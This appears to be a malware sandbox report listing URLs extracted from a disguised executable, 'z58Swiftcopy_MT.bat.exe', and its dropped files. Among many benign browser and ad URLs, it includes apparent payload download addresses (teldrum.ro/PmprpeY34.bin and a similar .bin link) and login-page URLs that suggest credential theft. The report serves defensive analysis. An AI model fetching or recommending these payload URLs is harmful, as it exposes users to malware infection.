                  Source: bhvD739.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?route=C512_BAY&stsid=S.BC4837E917425070&uaid=d9
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DhB9Gg0Em7s2jvLPGG9crywwB
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604&scid=1&mkt=en-US&Platform=Windows10&clienti
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?route=C512_BAY&uaid=b6de8762e4ae48b19a7d0d74ba392110
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://login.live.com/ppsecure/post.srf?mkt=en-US&platform=Windows10&id=80604&clientid=000000004807
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481006058.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481039246.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481200929.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481236030.000000000226F000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481123706.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481986828.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480970839.000000000226C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                  Source: z58Swiftcopy_MT.bat.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.css
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedFinishStrings.en_n0x1vWZ9nk5hsb6ZgnoOdw2.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_VjBVCmhpr777yb9vmuAJ
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/WinJS_vcvx4TydCFioSeM4NLxTDw2.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_43280e0ba671a1d8b5e34f1931c4fe4b.sv
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b8006
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031be
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostFinish_PCore_uuJCSTysLQ9JSYLCWmrHPQ2.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostLogin_PCore_3J49gjRV3LSCVj6qj73kPQ2.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/asyncchunk/win10hostlogin_ppassword_0901d04301714f
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://logincdn.msftauth.net/16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.css
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.28340161307.0000000002AA1000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475954920.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475613079.000000000227D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475803985.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478272302.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481006058.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28474962908.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481039246.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481200929.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478496438.0000000002277000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481236030.000000000226F000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475567204.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28481123706.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478173593.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477694523.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000002.28481986828.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28480970839.000000000226C000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478442693.0000000002272000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477629885.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475707662.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478024679.0000000002279000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476050726.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475853439.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://outlookmobile-office365-tas.msedge.net/ab?clientId=512A4435-60B8-42A2-80D3-582B6B7FB6C0&ig=1
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2787436b358dbd81d7fd0a0cccb05788
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f068a709ecd1f0c000b440d901cea9b
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_csp?id=adbundle&qqi=CPuOuO2wkvMCFQDJuwgdDw4EyQ&gqi=
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://pki.goog/repository/0
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://polyfill.io/v3/polyfill.min.js?features=2CElement.prototype.matches%2CElement.prototype.clos
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://px.ads.linkedin.com/setuid?partner=tripleliftdbredirect&tlUid=13122329571212727769&dbredirec
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/7zPvmktG8JzqA0vnWzpk_g--~A/Zmk9Zml0O3c9NjIyO2g9MzY4O2FwcGlkPWdlbWl
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpg
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpg
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k4.jpg
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478442693.0000000002272000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477629885.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475707662.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478024679.0000000002279000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=4aeddfea844042999a22bdcca1fba378&c=MSN&d=https%3A%2F%2Fwww.ms
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=838b780a64e64b0d92d628632c1c377c&c=MSN&d=https%3A%2F%2Fwww.ms
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.ms
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-ecst.licdn.com/apc/trans.gif?ae11829b3d6e895a2a3516fac536a339
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-ecst.licdn.com/apc/trans.gif?fa0d4adae7a556f7d0d03112de822178
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jque
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-d68e7b58/direct
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directi
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-d017f019/directi
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKp8YX.img?h=16&w=16&
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMqFmF.img?h=16&w=16&
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODMk8.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODQmd.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODept.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEFck.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEQ0I.img?h=368&w=62
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4WR.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4Xx.img?h=368&w=62
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFBrV.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFC5q.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=250&w=30
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFE0J.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFENj.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFJFJ.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFLk7.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFWV8.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFhty.img?h=368&w=62
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFsUC.img?h=250&w=30
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFu51.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFy7B.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFyKG.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=250&w=30
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG88s.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGPXq.img?h=194&w=30
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGQtJ.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGV90.img?h=194&w=30
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGapF.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGlbE.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGmTG.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGyYN.img?h=194&w=30
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH2Ml.img?h=194&w=30
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH6xB.img?h=75&w=100
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14hq0P.img?h=368&w=6
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&w=27
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&w=27
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&w=27
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ftEY0.img?h=16&w=16
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1gEFcn.img?h=16&w=16
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/css/b5dff51-e7c3b187/kernel-9c
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/js/b5dff51-96897e59/kernel-1e4
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpeg
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/2578937774238713912_2802581922324906360.jpeg
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/6852827437855218848_345419970373613283.jpeg
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-bold.wof
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-regular.
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semibold
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semiligh
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28479679200.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28479825849.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28479591434.0000000002AAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://t-ring-fallback.msedge.net/apc/trans.gif?3d88065febcc552cae09e5e8b74c55d5
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://t-ring-fallback.msedge.net/apc/trans.gif?7616d616e1c668bb563496121e660bee
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?01af3f8dd36bcb49643452aa096ff6c0
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?7de2246f1808e47769e35183d0153a7a
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?d0400e0387468531bdf7da710e2ae325
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?f0f9f226f444e2e246f9075ea908a633
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056632494.0000000002A18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32057397168.0000000002C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/PmprpeY34.bin
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056632494.0000000002A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/PmprpeY34.bin0Pf
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056632494.0000000002A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/PmprpeY34.bin:Pl
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32057397168.0000000002C60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/PmprpeY34.binTrilsRexcrestereamuschilor.ro/PmprpeY34.bin
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/html5/ssrh.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/in_page_full_auto_V1/Responsive_Monte_GpaSingleIfra
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/abg_lite.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/qs_click_protection.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/window_focus.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/simgad/14585816484902221120
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/d?subset_id=2&fvd=n3&v=3
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://use.typekit.net/ecr2zvs.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: z58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.google.com/
                  Source: z58Swiftcopy_MT.bat.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://www.google.com/chrome/
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478173593.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477694523.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28477629885.0000000002279000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28478024679.0000000002279000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://www.google.com/pagead/drt/ui
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/osd.js
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.msn.com
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.msn.com/
                  Source: z58Swiftcopy_MT.bat.exe, 00000003.00000003.28474962908.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475198040.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28474770977.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drString found in binary or memory: https://www.msn.com/?ocid=iehp
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-8
                  Source: bhvD739.tmp.3.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk
